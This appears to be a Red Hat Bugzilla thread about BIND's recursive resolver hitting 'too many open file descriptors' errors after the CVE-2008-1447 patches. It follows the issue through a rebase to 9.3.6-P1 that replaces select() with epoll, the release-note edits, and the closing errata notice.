Description of problem: Latest security patches have downgraded performance on big recursors. When named has to handle about 10000 queries per second performance is pretty bad and many queries are not responded. This is due latest security patches. ISC (= upstream) is going to solve this issue in upcomming 9.3.5-P2 update so we should apply patches too. Version-Release number of selected component (if applicable): # rpm -q bind bind-9.3.4-6.0.2.P1.el5_2 How reproducible: always Steps to Reproduce: Quite hard. named has to handle about 10000 queries per second. Actual results: Many queries fails due "too many open file descriptors" Expected results: nearly same performance as in previous versions Additional info: There are many mails about this problem on bind-users list (http://marc.info/?l=bind-users) and also on vendor-sec list. Other vendors are also going to release improved versions (at least Debian and Mandriva) I recommend rebase to 9.3.5-P2 version which will contain fix for this issue. It is maintenance release with many other fixes, no new features. At least we should backport performance fixes from 9.3.5-P2. (but as I wrote above use 9.3.5-P2 code is better long-term solution)
It does not take 10000 queries per second to reproduce this. I was getting an average of about one msg ("too many open file descriptors") per minute on a recursive DNS server that receives less 200 queries per sec. As far as I can tell, this happens because of queries that timeout. This should be reproducible by hitting your test recursor with a bunch of queries where the authoritative DNS server for those queries is unreachable. This particular fix (noted in the the upstream P2 release) may alleviate the "too many open file descriptors" in my situation: 2399. [bug] Abort timeout queries to reduce the number of open UDP sockets. [RT #18367]
Rebased to 9.3.6-P1.
Release note added. If any revisions are required, please set the "requires_release_notes" flag to "?" and edit the "Release Notes" field accordingly. All revisions will be proofread by the Engineering Content Services team. New Contents: Cause: ======= Fix for CVE-2008-1447 changed internal socket management logic which caused that named needs more sockets simulateously opened than before. System call select() can't handle such many opened descriptors. Consequence: ============ When server load increases approximately to 1000 queries per second then messages like "too many open file descriptors" appear in the log and named fails to handle next incomming queries. Fix: ==== Internal socket infrastructure has been reworked. System call select() is no longer used in favor of epoll infrastructure. Result: ======= BIND is able to handle far more bigger number of queries simulateously.
Release note updated. If any revisions are required, please set the "requires_release_notes" flag to "?" and edit the "Release Notes" field accordingly. All revisions will be proofread by the Engineering Content Services team. Diffed Contents: @@ -12,4 +12,6 @@ Result: ======= -BIND is able to handle far more bigger number of queries simulateously.+BIND is able to handle far more bigger number of queries simulateously. + +For complete list of bug fixes check /usr/share/doc/bind-*/CHANGES
~~ Attention - RHEL 5.4 Beta Released! ~~ RHEL 5.4 Beta has been released! There should be a fix present in the Beta release that addresses this particular request. Please test and report back results here, at your earliest convenience. RHEL 5.4 General Availability release is just around the corner! If you encounter any issues while testing Beta, please describe the issues you have encountered and set the bug into NEED_INFO. If you encounter new issues, please clone this bug to open a new issue and request it be reviewed for inclusion in RHEL 5.4 or a later update, if it is not of urgent severity. Please do not flip the bug status to VERIFIED. Only post your verification results, and if available, update Verified field with the appropriate value. Questions can be posted to this bug or your customer or partner representative.
An advisory has been issued which should help the problem described in this bug report. This report is therefore being closed with a resolution of ERRATA. For more information on therefore solution and/or where to find the updated files, please follow the link below. You may reopen this bug report if the solution does not work for you. http://rhn.redhat.com/errata/RHBA-2009-1420.html